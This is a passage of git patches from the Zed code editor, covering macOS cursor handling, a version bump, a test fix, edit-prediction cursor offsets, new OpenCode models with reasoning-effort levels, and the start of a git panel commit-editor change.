blurred_view: Option, background_appearance: WindowBackgroundAppearance, + cursor_style: CursorStyle, + cursor_hidden: bool, display_link: Option, renderer: renderer::Renderer, request_frame_callback: Option>, @@ -746,6 +781,8 @@ impl MacWindow { native_view: NonNull::new_unchecked(native_view), blurred_view: None, background_appearance: WindowBackgroundAppearance::Opaque, + cursor_style: CursorStyle::Arrow, + cursor_hidden: false, display_link: None, renderer: renderer::new_renderer( renderer_context, @@ -1767,6 +1804,79 @@ extern "C" fn dealloc_view(this: &Object, _: Sel) { } } +extern "C" fn reset_cursor_rects(this: &Object, _: Sel) { + // SAFETY: AppKit invokes cursor-rect updates on the main thread for GPUIView instances, + // whose WINDOW_STATE_IVAR is initialized when the view is created. The cursor registered + // below is a valid NSCursor. + unsafe { + let _: () = msg_send![super(this, class!(NSView)), resetCursorRects]; + + let window_state = get_window_state(this); + let cursor_style; + let cursor_hidden; + + { + let mut window_state = window_state.lock(); + + if matches!(window_state.cursor_style, CursorStyle::None) { + if !window_state.cursor_hidden { + let _: () = msg_send![class!(NSCursor), hide]; + window_state.cursor_hidden = true; + } + return; + } + + cursor_style = window_state.cursor_style; + cursor_hidden = window_state.cursor_hidden; + }; + + let cursor: id = match cursor_style { + CursorStyle::Arrow => msg_send![class!(NSCursor), arrowCursor], + CursorStyle::IBeam => msg_send![class!(NSCursor), IBeamCursor], + CursorStyle::Crosshair => msg_send![class!(NSCursor), crosshairCursor], + CursorStyle::ClosedHand => msg_send![class!(NSCursor), closedHandCursor], + CursorStyle::OpenHand => msg_send![class!(NSCursor), openHandCursor], + CursorStyle::PointingHand => msg_send![class!(NSCursor), pointingHandCursor], + CursorStyle::ResizeLeftRight => msg_send![class!(NSCursor), resizeLeftRightCursor], + CursorStyle::ResizeUpDown => msg_send![class!(NSCursor), resizeUpDownCursor], + CursorStyle::ResizeLeft => msg_send![class!(NSCursor), resizeLeftCursor], + CursorStyle::ResizeRight => msg_send![class!(NSCursor), resizeRightCursor], + CursorStyle::ResizeColumn => msg_send![class!(NSCursor), resizeLeftRightCursor], + CursorStyle::ResizeRow => msg_send![class!(NSCursor), resizeUpDownCursor], + CursorStyle::ResizeUp => msg_send![class!(NSCursor), resizeUpCursor], + CursorStyle::ResizeDown => msg_send![class!(NSCursor), resizeDownCursor], + + // Undocumented, private class methods: + // https://stackoverflow.com/questions/27242353/cocoa-predefined-resize-mouse-cursor + CursorStyle::ResizeUpLeftDownRight => { + msg_send![class!(NSCursor), _windowResizeNorthWestSouthEastCursor] + } + CursorStyle::ResizeUpRightDownLeft => { + msg_send![class!(NSCursor), _windowResizeNorthEastSouthWestCursor] + } + + CursorStyle::IBeamCursorForVerticalLayout => { + msg_send![class!(NSCursor), IBeamCursorForVerticalLayout] + } + CursorStyle::OperationNotAllowed => { + msg_send![class!(NSCursor), operationNotAllowedCursor] + } + CursorStyle::DragLink => msg_send![class!(NSCursor), dragLinkCursor], + CursorStyle::DragCopy => msg_send![class!(NSCursor), dragCopyCursor], + CursorStyle::ContextualMenu => msg_send![class!(NSCursor), contextualMenuCursor], + CursorStyle::None => unreachable!(), + }; + + if cursor_hidden { + let _: () = msg_send![class!(NSCursor), unhide]; + window_state.lock().cursor_hidden = false; + } + + let bounds = NSView::bounds(this as *const Object as id); + let _: () = msg_send![this, addCursorRect: bounds cursor: cursor]; + } +} + extern "C" fn handle_key_equivalent(this: &Object, _: Sel, native_event: id) -> BOOL { handle_key_event(this, native_event, true) } From 3ce9c384c70924f075457816180fe6c69562fc28 Mon Sep 17 00:00:00 2001 From: "Joseph T. Lyons" Date: Tue, 28 Apr 2026 09:53:33 -0400 Subject: [PATCH 076/231] Bump Zed to v1.2 (#55081) Release Notes: - N/A --- Cargo.lock | 2 +- crates/zed/Cargo.toml | 2 +- 2 files changed, 2 insertions(+), 2 deletions(-) diff --git a/Cargo.lock b/Cargo.lock index 5163528b0550f3..bc4e9dbf460b81 100644 --- a/Cargo.lock +++ b/Cargo.lock @@ -22364,7 +22364,7 @@ dependencies = [ [[package]] name = "zed" -version = "1.1.0" +version = "1.2.0" dependencies = [ "acp_thread", "acp_tools", diff --git a/crates/zed/Cargo.toml b/crates/zed/Cargo.toml index b77125796ab3ec..0374f6ec605651 100644 --- a/crates/zed/Cargo.toml +++ b/crates/zed/Cargo.toml @@ -2,7 +2,7 @@ description = "The fast, collaborative code editor." edition.workspace = true name = "zed" -version = "1.1.0" +version = "1.2.0" publish.workspace = true license = "GPL-3.0-or-later" authors = ["Zed Team "] From 8c501ef8544b3894705bafd832325f26656d9415 Mon Sep 17 00:00:00 2001 From: Kirill Bulatov Date: Tue, 28 Apr 2026 16:55:26 +0200 Subject: [PATCH 077/231] Fix the test for non-dev test runs (#55089) Release Notes: - N/A --- crates/settings/src/settings_store.rs | 9 ++++----- 1 file changed, 4 insertions(+), 5 deletions(-) diff --git a/crates/settings/src/settings_store.rs b/crates/settings/src/settings_store.rs index 0eb6a32465bbe9..5677b70b7c8e73 100644 --- a/crates/settings/src/settings_store.rs +++ b/crates/settings/src/settings_store.rs @@ -1786,11 +1786,10 @@ mod tests { #[gpui::test] fn test_default_settings_release_channel_overrides(cx: &mut App) { - assert_eq!( - *release_channel::RELEASE_CHANNEL, - release_channel::ReleaseChannel::Dev, - "tests expect the dev release channel", - ); + // The test deals with overrides and should ignore the other set-ups (Preview and Stable runs) + if *release_channel::RELEASE_CHANNEL != release_channel::ReleaseChannel::Dev { + return; + } let mut defaults: serde_json::Value = crate::parse_json_with_comments(&default_settings()).unwrap(); From fe99eb1b9f02b5c9b3a9d427b215913391d98b5a Mon Sep 17 00:00:00 2001 From: Oleksiy Syvokon Date: Tue, 28 Apr 2026 18:44:17 +0300 Subject: [PATCH 078/231] ep: Fix moving cursor to a predicted position (#55079) Starting ~3 weeks ago, `output` no longer contains the cursor marker, cloud strips it on parsing. Instead, it should return a cursor offset. Release Notes: - Fixed moving the cursor to a predicted position in Zeta 2 --- crates/cloud_llm_client/src/predict_edits_v3.rs | 3 +++ crates/edit_prediction/src/edit_prediction_tests.rs | 7 ++++++- crates/edit_prediction/src/zeta.rs | 13 ++++++------- 3 files changed, 15 insertions(+), 8 deletions(-) diff --git a/crates/cloud_llm_client/src/predict_edits_v3.rs b/crates/cloud_llm_client/src/predict_edits_v3.rs index 36c091a3100844..f9349628481572 100644 --- a/crates/cloud_llm_client/src/predict_edits_v3.rs +++ b/crates/cloud_llm_client/src/predict_edits_v3.rs @@ -46,6 +46,9 @@ pub struct PredictEditsV3Response { pub editable_range: Range, #[serde(default, skip_serializing_if = "Option::is_none")] pub model_version: Option, + /// Predicted cursor offset within `output`. + #[serde(skip_serializing_if = "Option::is_none")] + pub cursor_offset: Option, } #[derive(Debug, Deserialize, Serialize)] diff --git a/crates/edit_prediction/src/edit_prediction_tests.rs b/crates/edit_prediction/src/edit_prediction_tests.rs index 6cc38a875e19cf..be6ea025496ee1 100644 --- a/crates/edit_prediction/src/edit_prediction_tests.rs +++ b/crates/edit_prediction/src/edit_prediction_tests.rs @@ -2356,6 +2356,7 @@ fn model_response(request: &PredictEditsV3Request, diff_to_apply: &str) -> Predi request_id: Uuid::new_v4().to_string(), editable_range, output: new_excerpt, + cursor_offset: None, model_version: None, } } @@ -2365,6 +2366,7 @@ fn empty_response() -> PredictEditsV3Response { request_id: Uuid::new_v4().to_string(), editable_range: 0..0, output: String::new(), + cursor_offset: None, model_version: None, } } @@ -2713,6 +2715,7 @@ async fn test_edit_prediction_no_spurious_trailing_newline(cx: &mut TestAppConte output: "hello world\n".to_string(), editable_range: 0..excerpt_length, model_version: None, + cursor_offset: None, }; respond_tx.send(response).unwrap(); @@ -2771,9 +2774,10 @@ async fn test_v3_prediction_strips_cursor_marker_from_edit_text(cx: &mut TestApp respond_tx .send(PredictEditsV3Response { request_id: Uuid::new_v4().to_string(), - output: "hello<|user_cursor|> world".to_string(), + output: "hello world".to_string(), editable_range: 0..excerpt_length, model_version: None, + cursor_offset: Some(5), }) .unwrap(); @@ -2878,6 +2882,7 @@ async fn make_test_ep_store( editable_range: 0..req.input.cursor_excerpt.len(), output: completion_response.lock().clone(), model_version: None, + cursor_offset: None, }) .unwrap() .into(), diff --git a/crates/edit_prediction/src/zeta.rs b/crates/edit_prediction/src/zeta.rs index 6a287847fd2b0e..c2e622ea010fea 100644 --- a/crates/edit_prediction/src/zeta.rs +++ b/crates/edit_prediction/src/zeta.rs @@ -25,8 +25,7 @@ use zeta_prompt::{ParsedOutput, ZetaPromptInput}; use std::{env, ops::Range, path::Path, sync::Arc}; use zeta_prompt::{ ZetaFormat, format_zeta_prompt, get_prefill, parse_zeta2_model_output, - parsed_output_from_editable_region, prompt_input_contains_special_tokens, - stop_tokens_for_format, + prompt_input_contains_special_tokens, stop_tokens_for_format, zeta1::{self, EDITABLE_REGION_END_MARKER}, }; @@ -280,12 +279,12 @@ pub fn request_prediction_with_zeta( .await?; let request_id = EditPredictionId(response.request_id.into()); - let output_text = Some(response.output).filter(|s| !s.is_empty()); let model_version = response.model_version; - let parsed_output = parsed_output_from_editable_region( - response.editable_range, - output_text.unwrap_or_default(), - ); + let parsed_output = ParsedOutput { + new_editable_region: response.output, + range_in_excerpt: response.editable_range, + cursor_offset_in_new_editable_region: response.cursor_offset, + }; Some((request_id, Some(parsed_output), model_version, usage)) }) From 65729f4de6404a8bbd91ea7b2b86cc5826d3c051 Mon Sep 17 00:00:00 2001 From: Vlad Ionescu Date: Tue, 28 Apr 2026 19:00:27 +0300 Subject: [PATCH 079/231] opencode: Model updates + thinking levels (#54880) MIME-Version: 1.0 Content-Type: text/plain; charset=UTF-8 Content-Transfer-Encoding: 8bit Leftovers after https://github.com/zed-industries/zed/pull/53651 Updated models: - **Zen**: GPT 5.5 and GPT 5.5 Pro - not tested because I don't have a Zen subscription and I stubbornly refuse to get one - **Go**: DeepSeek V4 Pro and DeepSeek V4 Flash - failing due to https://github.com/anomalyco/opencode/issues/24224 - **Go**: MiMo V2.5 and MiMo V2.5 Pro - tested, confirmed working - **Free**: Ling 2.6 Flash, [available for "a limited time"](https://x.com/opencode/status/2046717718028513694) - tested, confirmed working - **Free**: Hy3 Preview, [available until May 8](https://x.com/opencode/status/2047328981435756824) - tested, confirmed working When testing the new models and comparing with OpenCode CLI, I realized the [variants](https://opencode.ai/docs/models/#built-in-variants)/thinking effort configuration was not supported by the Zed Agent implementation. I added that for OpenCode Go models, after manually checking what each model supports in OpenCode. Reasoning levels and everything seems to work (UI looks good, model works) but I have no idea how to specifically test reasoning levels without doing a full benchmark 🤷 I did not add the same thing for OpenCode Zen models because I could not figure out a way to get the supported variants. @benbrandt let me know if you want me to take this out of this PR and to keep just the model updates! Self-Review Checklist: - [x] I've reviewed my own diff for quality, security, and reliability - [x] Unsafe blocks (if any) have justifying comments - [x] The content is consistent with the [UI/UX checklist](https://github.com/zed-industries/zed/blob/main/CONTRIBUTING.md#uiux-checklist) - [ ] Tests cover the new/changed behavior - [x] Performance impact has been considered and is acceptable Release Notes: - OpenCode: add new models (GPT 5.5, DeepSeek V4, MiMo V2.5, Ling 2.6, Hy3) - OpenCode Go: add support for configurable reasoning effort levels --------- Co-authored-by: Ben Brandt --- Cargo.lock | 1 + .../language_models/src/provider/opencode.rs | 86 +++++++++++- crates/opencode/Cargo.toml | 1 + crates/opencode/src/opencode.rs | 127 ++++++++++++++++-- crates/settings_content/src/language_model.rs | 3 + docs/src/ai/llm-providers.md | 2 + 6 files changed, 201 insertions(+), 19 deletions(-) diff --git a/Cargo.lock b/Cargo.lock index bc4e9dbf460b81..92dfd5304b5152 100644 --- a/Cargo.lock +++ b/Cargo.lock @@ -11872,6 +11872,7 @@ dependencies = [ "futures 0.3.32", "google_ai", "http_client", + "language_model_core", "schemars 1.0.4", "serde", "serde_json", diff --git a/crates/language_models/src/provider/opencode.rs b/crates/language_models/src/provider/opencode.rs index f8097b1798d863..6c0d4a5d3fe1b8 100644 --- a/crates/language_models/src/provider/opencode.rs +++ b/crates/language_models/src/provider/opencode.rs @@ -7,9 +7,10 @@ use gpui::{AnyView, App, AsyncApp, Context, Entity, SharedString, Task, Window}; use http_client::{AsyncBody, HttpClient, http}; use language_model::{ ApiKeyState, AuthenticateError, EnvVar, IconOrSvg, LanguageModel, LanguageModelCompletionError, - LanguageModelCompletionEvent, LanguageModelId, LanguageModelName, LanguageModelProvider, - LanguageModelProviderId, LanguageModelProviderName, LanguageModelProviderState, - LanguageModelRequest, LanguageModelToolChoice, RateLimiter, env_var, + LanguageModelCompletionEvent, LanguageModelEffortLevel, LanguageModelId, LanguageModelName, + LanguageModelProvider, LanguageModelProviderId, LanguageModelProviderName, + LanguageModelProviderState, LanguageModelRequest, LanguageModelToolChoice, RateLimiter, + ReasoningEffort, env_var, }; use opencode::{ApiProtocol, OPENCODE_API_URL, OpenCodeSubscription}; pub use settings::OpenCodeAvailableModel as AvailableModel; @@ -29,6 +30,27 @@ use crate::provider::open_ai::{ OpenAiEventMapper, OpenAiResponseEventMapper, into_open_ai, into_open_ai_response, }; +fn normalize_reasoning_effort(effort: &str) -> Option { + match effort.trim().to_ascii_lowercase().as_str() { + "minimal" => Some(ReasoningEffort::Minimal), + "low" => Some(ReasoningEffort::Low), + "medium" => Some(ReasoningEffort::Medium), + "high" => Some(ReasoningEffort::High), + "max" | "xhigh" => Some(ReasoningEffort::XHigh), + _ => None, + } +} + +fn reasoning_effort_display(effort: ReasoningEffort) -> (&'static str, &'static str) { + match effort { + ReasoningEffort::Minimal => ("Minimal", "minimal"), + ReasoningEffort::Low => ("Low", "low"), + ReasoningEffort::Medium => ("Medium", "medium"), + ReasoningEffort::High => ("High", "high"), + ReasoningEffort::XHigh => ("Max", "max"), + } +} + const PROVIDER_ID: LanguageModelProviderId = LanguageModelProviderId::new("opencode"); const PROVIDER_NAME: LanguageModelProviderName = LanguageModelProviderName::new("OpenCode"); @@ -254,6 +276,7 @@ impl LanguageModelProvider for OpenCodeLanguageModelProvider { max_tokens: model.max_tokens, max_output_tokens: model.max_output_tokens, protocol, + reasoning_effort_levels: model.reasoning_effort_levels.clone(), custom_model_api_url: model.custom_model_api_url.clone(), }; let key = format!("{}/{}", subscription.id_prefix(), model.name); @@ -522,6 +545,36 @@ impl LanguageModel for OpenCodeLanguageModel { self.model.supports_images() } + fn supports_thinking(&self) -> bool { + self.model + .supported_reasoning_effort_levels() + .is_some_and(|levels| !levels.is_empty()) + } + + fn supported_effort_levels(&self) -> Vec { + self.model + .supported_reasoning_effort_levels() + .map(|levels| { + if levels.is_empty() { + return Vec::new(); + } + let default_index = levels.len() - 1; + levels + .into_iter() + .enumerate() + .map(|(i, effort)| { + let (name, value) = reasoning_effort_display(effort); + LanguageModelEffortLevel { + name: name.into(), + value: value.into(), + is_default: i == default_index, + } + }) + .collect() + }) + .unwrap_or_default() + } + fn supports_tool_choice(&self, choice: LanguageModelToolChoice) -> bool { match choice { LanguageModelToolChoice::Auto | LanguageModelToolChoice::Any => true, @@ -576,12 +629,17 @@ impl LanguageModel for OpenCodeLanguageModel { match self.model.protocol(self.subscription) { ApiProtocol::Anthropic => { + let mode = if self.supports_thinking() && request.thinking_allowed { + anthropic::AnthropicModelMode::AdaptiveThinking + } else { + anthropic::AnthropicModelMode::Default + }; let anthropic_request = into_anthropic( request, self.model.id().to_string(), 1.0, self.model.max_output_tokens().unwrap_or(8192), - anthropic::AnthropicModelMode::Default, + mode, ); let stream = self.stream_anthropic(anthropic_request, http_client, cx); async move { @@ -591,13 +649,21 @@ impl LanguageModel for OpenCodeLanguageModel { .boxed() } ApiProtocol::OpenAiChat => { + let reasoning_effort = if request.thinking_allowed { + request + .thinking_effort + .as_deref() + .and_then(normalize_reasoning_effort) + } else { + None + }; let openai_request = into_open_ai( request, self.model.id(), false, false, self.model.max_output_tokens(), - None, + reasoning_effort, false, ); let stream = self.stream_openai_chat(openai_request, http_client, cx); @@ -608,13 +674,21 @@ impl LanguageModel for OpenCodeLanguageModel { .boxed() } ApiProtocol::OpenAiResponses => { + let reasoning_effort = if request.thinking_allowed { + request + .thinking_effort + .as_deref() + .and_then(normalize_reasoning_effort) + } else { + None + }; let response_request = into_open_ai_response( request, self.model.id(), false, false, self.model.max_output_tokens(), - None, + reasoning_effort, ); let stream = self.stream_openai_response(response_request, http_client, cx); async move { diff --git a/crates/opencode/Cargo.toml b/crates/opencode/Cargo.toml index 758d2f2479b9f8..035d78d53f4d7c 100644 --- a/crates/opencode/Cargo.toml +++ b/crates/opencode/Cargo.toml @@ -21,6 +21,7 @@ anyhow.workspace = true futures.workspace = true google_ai.workspace = true http_client.workspace = true +language_model_core.workspace = true schemars = { workspace = true, optional = true } serde.workspace = true serde_json.workspace = true diff --git a/crates/opencode/src/opencode.rs b/crates/opencode/src/opencode.rs index 9278d81677b08f..5ac344110115f7 100644 --- a/crates/opencode/src/opencode.rs +++ b/crates/opencode/src/opencode.rs @@ -1,6 +1,7 @@ use anyhow::{Result, anyhow}; use futures::{AsyncBufReadExt, AsyncReadExt, StreamExt, io::BufReader, stream::BoxStream}; use http_client::{AsyncBody, HttpClient, Method, Request as HttpRequest}; +use language_model_core::ReasoningEffort; use serde::{Deserialize, Serialize}; use strum::EnumIter; @@ -76,6 +77,10 @@ pub enum Model { Claude3_5Haiku, // -- OpenAI Responses API models -- + #[serde(rename = "gpt-5.5")] + Gpt5_5, + #[serde(rename = "gpt-5.5-pro")] + Gpt5_5Pro, #[serde(rename = "gpt-5.4")] Gpt5_4, #[serde(rename = "gpt-5.4-pro")] @@ -114,6 +119,14 @@ pub enum Model { Gemini3Flash, // -- OpenAI Chat Completions protocol models -- + #[serde(rename = "deepseek-v4-pro")] + DeepSeekV4Pro, + #[serde(rename = "deepseek-v4-flash")] + DeepSeekV4Flash, + #[serde(rename = "ling-2.6-flash-free")] + Ling2_6FlashFree, + #[serde(rename = "hy3-preview-free")] + Hy3PreviewFree, #[serde(rename = "minimax-m2.5")] MiniMaxM2_5, #[serde(rename = "minimax-m2.5-free")] @@ -132,6 +145,10 @@ pub enum Model { MimoV2Pro, #[serde(rename = "mimo-v2-omni")] MimoV2Omni, + #[serde(rename = "mimo-v2.5-pro")] + MimoV2_5Pro, + #[serde(rename = "mimo-v2.5")] + MimoV2_5, #[serde(rename = "big-pickle")] BigPickle, #[serde(rename = "nemotron-3-super-free")] @@ -149,6 +166,7 @@ pub enum Model { max_tokens: u64, max_output_tokens: Option, protocol: ApiProtocol, + reasoning_effort_levels: Option>, custom_model_api_url: Option, }, } @@ -186,12 +204,20 @@ impl Model { | Self::Qwen3_6Plus => &[OpenCodeSubscription::Zen, OpenCodeSubscription::Go], // Go-only models - Self::MiniMaxM2_7 | Self::MimoV2Pro | Self::MimoV2Omni => &[OpenCodeSubscription::Go], + Self::MiniMaxM2_7 + | Self::MimoV2_5Pro + | Self::MimoV2_5 + | Self::MimoV2Pro + | Self::MimoV2Omni + | Self::DeepSeekV4Pro + | Self::DeepSeekV4Flash => &[OpenCodeSubscription::Go], // Free models - Self::MiniMaxM2_5Free | Self::Nemotron3SuperFree | Self::BigPickle => { - &[OpenCodeSubscription::Free] - } + Self::MiniMaxM2_5Free + | Self::Nemotron3SuperFree + | Self::BigPickle + | Self::Ling2_6FlashFree + | Self::Hy3PreviewFree => &[OpenCodeSubscription::Free], // Custom models get their subscription from settings, not from here Self::Custom { .. } => &[], @@ -213,6 +239,8 @@ impl Model { Self::ClaudeHaiku4_5 => "claude-haiku-4-5", Self::Claude3_5Haiku => "claude-3-5-haiku", + Self::Gpt5_5 => "gpt-5.5", + Self::Gpt5_5Pro => "gpt-5.5-pro", Self::Gpt5_4 => "gpt-5.4", Self::Gpt5_4Pro => "gpt-5.4-pro", Self::Gpt5_4Mini => "gpt-5.4-mini", @@ -232,6 +260,10 @@ impl Model { Self::Gemini3_1Pro => "gemini-3.1-pro", Self::Gemini3Flash => "gemini-3-flash", + Self::DeepSeekV4Pro => "deepseek-v4-pro", + Self::DeepSeekV4Flash => "deepseek-v4-flash", + Self::Ling2_6FlashFree => "ling-2.6-flash-free", + Self::Hy3PreviewFree => "hy3-preview-free", Self::MiniMaxM2_5 => "minimax-m2.5", Self::MiniMaxM2_5Free => "minimax-m2.5-free", Self::Glm5 => "glm-5", @@ -241,6 +273,8 @@ impl Model { Self::MiniMaxM2_7 => "minimax-m2.7", Self::MimoV2Pro => "mimo-v2-pro", Self::MimoV2Omni => "mimo-v2-omni", + Self::MimoV2_5Pro => "mimo-v2.5-pro", + Self::MimoV2_5 => "mimo-v2.5", Self::Qwen3_5Plus => "qwen3.5-plus", Self::Qwen3_6Plus => "qwen3.6-plus", Self::BigPickle => "big-pickle", @@ -262,6 +296,8 @@ impl Model { Self::ClaudeHaiku4_5 => "Claude Haiku 4.5", Self::Claude3_5Haiku => "Claude Haiku 3.5", + Self::Gpt5_5 => "GPT 5.5", + Self::Gpt5_5Pro => "GPT 5.5 Pro", Self::Gpt5_4 => "GPT 5.4", Self::Gpt5_4Pro => "GPT 5.4 Pro", Self::Gpt5_4Mini => "GPT 5.4 Mini", @@ -281,6 +317,10 @@ impl Model { Self::Gemini3_1Pro => "Gemini 3.1 Pro", Self::Gemini3Flash => "Gemini 3 Flash", + Self::DeepSeekV4Pro => "DeepSeek V4 Pro", + Self::DeepSeekV4Flash => "DeepSeek V4 Flash", + Self::Ling2_6FlashFree => "Ling 2.6 Flash Free", + Self::Hy3PreviewFree => "Hy3 Preview Free", Self::MiniMaxM2_5 => "MiniMax M2.5", Self::MiniMaxM2_5Free => "MiniMax M2.5 Free", Self::Glm5 => "GLM 5", @@ -290,6 +330,8 @@ impl Model { Self::MiniMaxM2_7 => "MiniMax M2.7", Self::MimoV2Pro => "MiMo V2 Pro", Self::MimoV2Omni => "MiMo V2 Omni", + Self::MimoV2_5Pro => "MiMo V2.5 Pro", + Self::MimoV2_5 => "MiMo V2.5", Self::Qwen3_5Plus => "Qwen3.5 Plus", Self::Qwen3_6Plus => "Qwen3.6 Plus", Self::BigPickle => "Big Pickle", @@ -323,7 +365,9 @@ impl Model { | Self::ClaudeHaiku4_5 | Self::Claude3_5Haiku => ApiProtocol::Anthropic, - Self::Gpt5_4 + Self::Gpt5_5 + | Self::Gpt5_5Pro + | Self::Gpt5_4 | Self::Gpt5_4Pro | Self::Gpt5_4Mini | Self::Gpt5_4Nano @@ -341,6 +385,8 @@ impl Model { Self::Gemini3_1Pro | Self::Gemini3Flash => ApiProtocol::Google, + Self::DeepSeekV4Pro | Self::DeepSeekV4Flash => ApiProtocol::Anthropic, + Self::MiniMaxM2_5Free | Self::Glm5 | Self::Glm5_1 @@ -348,10 +394,14 @@ impl Model { | Self::KimiK2_6 | Self::MimoV2Pro | Self::MimoV2Omni + | Self::MimoV2_5Pro + | Self::MimoV2_5 | Self::Qwen3_5Plus | Self::Qwen3_6Plus | Self::BigPickle - | Self::Nemotron3SuperFree => ApiProtocol::OpenAiChat, + | Self::Nemotron3SuperFree + | Self::Ling2_6FlashFree + | Self::Hy3PreviewFree => ApiProtocol::OpenAiChat, Self::Custom { protocol, .. } => *protocol, } @@ -369,6 +419,7 @@ impl Model { Self::Claude3_5Haiku => 200_000, // OpenAI models + Self::Gpt5_5 | Self::Gpt5_5Pro => 1_050_000, Self::Gpt5_4 | Self::Gpt5_4Pro => 1_050_000, Self::Gpt5_4Mini | Self::Gpt5_4Nano => 400_000, Self::Gpt5_3Codex => 400_000, @@ -386,13 +437,17 @@ impl Model { // OpenAI-compatible models Self::MiniMaxM2_7 => 204_800, Self::MiniMaxM2_5 | Self::MiniMaxM2_5Free => 204_800, - Self::Glm5 | Self::Glm5_1 => 204_800, + Self::Glm5 | Self::Glm5_1 => 202_725, Self::KimiK2_6 | Self::KimiK2_5 => 262_144, - Self::MimoV2Pro => 1_048_576, + Self::MimoV2_5Pro | Self::MimoV2Pro => 1_048_576, + Self::MimoV2_5 => 1_000_000, Self::MimoV2Omni => 262_144, Self::Qwen3_5Plus | Self::Qwen3_6Plus => 262_144, Self::BigPickle => 200_000, Self::Nemotron3SuperFree => 204_800, + Self::DeepSeekV4Pro | Self::DeepSeekV4Flash => 1_000_000, + Self::Ling2_6FlashFree => 262_100, + Self::Hy3PreviewFree => 256_000, Self::Custom { max_tokens, .. } => *max_tokens, } @@ -411,7 +466,9 @@ impl Model { Self::Claude3_5Haiku => Some(8_192), // OpenAI models - Self::Gpt5_4 + Self::Gpt5_5 + | Self::Gpt5_5Pro + | Self::Gpt5_4 | Self::Gpt5_4Pro | Self::Gpt5_4Mini | Self::Gpt5_4Nano @@ -430,15 +487,22 @@ impl Model { // Google models Self::Gemini3_1Pro | Self::Gemini3Flash => Some(65_536), + // Anthropic-compatible models + Self::DeepSeekV4Pro | Self::DeepSeekV4Flash => Some(384_000), + // OpenAI-compatible models Self::MiniMaxM2_7 => Some(131_072), Self::MiniMaxM2_5 | Self::MiniMaxM2_5Free => Some(131_072), - Self::Glm5 | Self::Glm5_1 => Some(131_072), + Self::Glm5 | Self::Glm5_1 => Some(32_768), Self::BigPickle => Some(128_000), Self::KimiK2_6 | Self::KimiK2_5 => Some(65_536), Self::Qwen3_5Plus | Self::Qwen3_6Plus => Some(65_536), Self::Nemotron3SuperFree => Some(128_000), - Self::MimoV2Pro | Self::MimoV2Omni => Some(64_000), + Self::MimoV2_5Pro | Self::MimoV2_5 | Self::MimoV2Pro | Self::MimoV2Omni => { + Some(128_000) + } + Self::Ling2_6FlashFree => Some(32_800), + Self::Hy3PreviewFree => Some(64_000), Self::Custom { max_output_tokens, .. @@ -464,7 +528,9 @@ impl Model { | Self::Claude3_5Haiku => true, // OpenAI models support images - Self::Gpt5_4 + Self::Gpt5_5 + | Self::Gpt5_5Pro + | Self::Gpt5_4 | Self::Gpt5_4Pro | Self::Gpt5_4Mini | Self::Gpt5_4Nano @@ -487,6 +553,7 @@ impl Model { Self::KimiK2_6 | Self::KimiK2_5 | Self::MimoV2Omni + | Self::MimoV2_5 | Self::Qwen3_5Plus | Self::Qwen3_6Plus => true, @@ -497,8 +564,14 @@ impl Model { | Self::Glm5_1 | Self::MiniMaxM2_7 | Self::MimoV2Pro + | Self::MimoV2_5Pro | Self::BigPickle - | Self::Nemotron3SuperFree => false, + | Self::Nemotron3SuperFree + | Self::Ling2_6FlashFree + | Self::Hy3PreviewFree => false, + + // DeepSeek models (Anthropic protocol) don't support images + Self::DeepSeekV4Pro | Self::DeepSeekV4Flash => false, Self::Custom { protocol, .. } => matches!( protocol, @@ -509,6 +582,34 @@ impl Model { ), } } + + pub fn supported_reasoning_effort_levels(&self) -> Option> { + match self { + Self::MimoV2_5Pro + | Self::MimoV2_5 + | Self::MimoV2Pro + | Self::MimoV2Omni + | Self::Hy3PreviewFree => Some(vec![ + ReasoningEffort::Low, + ReasoningEffort::Medium, + ReasoningEffort::High, + ]), + + Self::DeepSeekV4Pro | Self::DeepSeekV4Flash => Some(vec![ + ReasoningEffort::Low, + ReasoningEffort::Medium, + ReasoningEffort::High, + ReasoningEffort::XHigh, + ]), + + Self::Custom { + reasoning_effort_levels, + .. + } => reasoning_effort_levels.clone(), + + _ => None, + } + } } /// Stream generate content for Google models via OpenCode. diff --git a/crates/settings_content/src/language_model.rs b/crates/settings_content/src/language_model.rs index 1a16c5264a70bd..619e9d72f84703 100644 --- a/crates/settings_content/src/language_model.rs +++ b/crates/settings_content/src/language_model.rs @@ -1,5 +1,6 @@ use crate::merge_from::MergeFrom; use collections::HashMap; +use language_model_core::ReasoningEffort; use schemars::JsonSchema; use serde::{Deserialize, Serialize}; use settings_macros::{MergeFrom, with_fallible_options}; @@ -179,6 +180,8 @@ pub struct OpenCodeAvailableModel { pub subscription: Option, /// Custom Model API URL to use for this model. pub custom_model_api_url: Option, + /// Supported reasoning effort levels, for example `["low", "medium", "high"]. + pub reasoning_effort_levels: Option>, } #[with_fallible_options] diff --git a/docs/src/ai/llm-providers.md b/docs/src/ai/llm-providers.md index fad9ace28aa5da..b38874730ecd5b 100644 --- a/docs/src/ai/llm-providers.md +++ b/docs/src/ai/llm-providers.md @@ -663,6 +663,7 @@ The Zed agent comes pre-configured with OpenCode models. If you wish to use newe "max_tokens": 123456, "max_output_tokens": 98765, "protocol": "openai_chat", + "reasoning_effort_levels": ["low", "medium", "high"], "subscription": "go", "custom_model_api_url": "https://example.com/zen" } @@ -679,6 +680,7 @@ The available configuration options for custom models are: - `max_tokens` (required): maximum model context window size, for example `1000000` - `max_output_tokens` (optional): maximum tokens the model can generate, for example `64000` - `protocol` (required): model API protocol, one of `"anthropic"`, `"openai_responses"`, `"openai_chat"`, or `"google"` +- `reasoning_effort_levels` (optional): list of supported reasoning effort levels, for example `["low", "medium", "high"]`. The latest value in the list is used as the default - `subscription` (optional): `"zen"`, `"go"`, or `"free"` (defaults to `"zen"`) - `custom_model_api_url` (optional): custom API base URL to use instead of the default OpenCode API From a4f0b354b82f19a22534cca309b692dcfb62f741 Mon Sep 17 00:00:00 2001 From: Dino Date: Tue, 28 Apr 2026 17:09:23 +0100 Subject: [PATCH 080/231] git_panel: Add support for vertically expanding the commit editor (#55043) Using the existing commit editor in the Git Panel to type out longer commit messages has been somewhat hard. I believe this happens because it takes a very small portion of the UI which, unfortunately, when `git: expand commit editor` is used, a modal ends up taking the center of the editor, making it possible to have the commit editor open on the side, while the `git: diff` view is open. As such, this Pull Request introduces a new `git::ToggleFillCommitEditor` action that allows users to update the commit editor's height so as to take as much vertical space as possible, hiding the entries status and simply rendering the Git Panel's footer. This makes it easier to be able to write longer commit messages while still having the `git: branch diff` on the side, something that's very complicated with the default number of lines in the commit editor and impossible using the `CommitModal`. Self-Review Checklist: - [x] I've reviewed my own diff for quality, security, and reliability - [x] Unsafe blocks (if any) have justifying comments - [x] The content is consistent with the 